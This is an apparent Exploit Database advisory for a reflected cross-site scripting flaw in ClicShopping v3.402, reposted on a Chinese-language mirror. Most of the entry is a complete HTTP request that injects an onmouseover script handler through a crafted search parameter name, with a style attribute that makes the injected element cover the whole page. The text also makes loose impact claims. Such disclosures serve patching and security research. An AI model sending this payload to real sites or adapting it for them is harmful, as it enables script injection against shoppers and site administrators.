ClicShopping v3.402 – Cross-Site Scripting (XSS)

• Exploit Database
• 35 阅读

• 作者： nu11secur1ty
  日期： 2023-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51135/

• ## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS) 
  ## Author: nu11secur1ty
  ## Date: 11.20.2022
  ## Vendor: https://www.clicshopping.org/forum/
  ## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402
  ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3
  
  ## Description:
  The name of an arbitrarily supplied URL parameter is copied into the
  value of an HTML tag attribute which is encapsulated in double
  quotation marks.
  The attacker can trick users to open a very dangerous link or he can
  get sensitive information, also he can destroy some components of your
  system.
  
  ## STATUS: HIGH Vulnerability
  
  [+] Payload:
  
  ```js
  GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1
  HTTP/1.1
  Host: pwnedhost.com
  Accept-Encoding: gzip, deflate
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
  Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
  Sec-CH-UA-Platform: Windows
  Sec-CH-UA-Mobile: ?0
  
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)
  
  ## Proof and Exploit:
  [href]()https://streamable.com/rzpgsu
  
  ## Time spent
  `1:00`
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html and https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>